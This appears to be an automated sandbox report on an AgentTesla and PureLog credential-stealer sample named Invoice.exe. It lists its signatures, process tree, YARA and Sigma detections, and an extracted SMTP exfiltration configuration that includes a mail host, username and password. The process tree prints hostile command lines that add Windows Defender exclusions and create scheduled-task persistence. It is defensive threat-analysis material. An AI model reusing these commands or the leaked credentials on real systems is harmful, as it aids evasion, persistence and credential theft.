Edit tour

Windows Analysis Report
Invoice.exe

Overview

General Information

Sample name:	Invoice.exe
Analysis ID:	1432075
MD5:	df0a67f2a0c162c5a5dee0a8fcd8ab22
SHA1:	07981693f5b38fa99a88aca0e13ba5b6022b1465
SHA256:	e62255f98543e0bb1abf017af13fd483e1382158021b7edde65fa55c1ad290cf
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Invoice.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\Invoice.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

powershell.exe (PID: 5888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7216 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Invoice.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\Invoice.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

Invoice.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\Invoice.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

Invoice.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Invoice.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

kaJNzBnxbXm.exe (PID: 7496 cmdline: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

kaJNzBnxbXm.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

BjTxJte.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

schtasks.exe (PID: 8088 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpE34B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BjTxJte.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

BjTxJte.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

BjTxJte.exe (PID: 4040 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

schtasks.exe (PID: 7180 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmp21D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BjTxJte.exe (PID: 6356 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: DF0A67F2A0C162C5A5DEE0A8FCD8AB22)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.starmech.net", "Username": "electronics@starmech.net", "Password": "nics123"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.1937601550.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1721400076.00000000056C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1711744311.0000000003E59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001B.00000002.4153454103.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Invoice.exe PID: 6428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Invoice.exe PID: 6428	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Invoice.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Invoice.exe PID: 7396	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: kaJNzBnxbXm.exe PID: 7496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: kaJNzBnxbXm.exe PID: 7496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: kaJNzBnxbXm.exe PID: 7496	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: kaJNzBnxbXm.exe PID: 7788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: kaJNzBnxbXm.exe PID: 7788	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: BjTxJte.exe PID: 7948	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BjTxJte.exe PID: 8148	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BjTxJte.exe PID: 8148	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: BjTxJte.exe PID: 4040	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BjTxJte.exe PID: 6356	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BjTxJte.exe PID: 6356	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Invoice.exe.3e59970.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice.exe.3e59970.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice.exe.56c0000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.kaJNzBnxbXm.exe.42aa410.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.kaJNzBnxbXm.exe.42aa410.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.kaJNzBnxbXm.exe.42aa410.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31dfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31f18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ff4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3208a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3211a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33bfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33df4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e8a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f1a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice.exe.56c0000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.BjTxJte.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.BjTxJte.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
20.2.BjTxJte.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33bfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33df4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e8a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f1a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice.exe.4b48230.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.4b48230.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Invoice.exe.4b48230.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31dfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31f18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ff4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3208a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3211a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31d8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31dfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31e86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31f18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31f82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31ff4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3208a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3211a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6edaa:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33bfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6ee1c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6eea6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6ef38:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6efa2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33df4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f014:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e8a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f0aa:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f1a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f13a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice.exe.4a4f1f0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.4a4f1f0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice.exe.4a4f1f0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Invoice.exe.4a4f1f0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x12cbca:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x167dea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1a2e0a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x12cc3c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x167e5c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1a2e7c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x12ccc6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x167ee6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1a2f06:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x12cd58:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x167f78:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1a2f98:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x12cdc2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x167fe2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1a3002:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x12ce34:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x168054:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1a3074:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x12ceca:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1680ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1a310a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Invoice.exe.4acba10.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.4acba10.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Invoice.exe.4acba10.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Invoice.exe.4acba10.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0xb03aa:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xeb5ca:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1265ea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xb041c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xeb63c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x12665c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xb04a6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xeb6c6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1266e6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xb0538:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xeb758:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x126778:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xb05a2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xeb7c2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1267e2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xb0614:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xeb834:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x126854:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xb06aa:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xeb8ca:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1268ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Invoice.exe.4b48230.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.4b48230.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Invoice.exe.4b48230.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33b8a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6edaa:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa9dca:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33bfc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6ee1c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa9e3c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33c86:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6eea6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa9ec6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d18:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6ef38:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa9f58:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33d82:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6efa2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa9fc2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33df4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f014:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaa034:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33e8a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f0aa:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaa0ca:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 6428, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", ProcessId: 5888, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Invoice.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

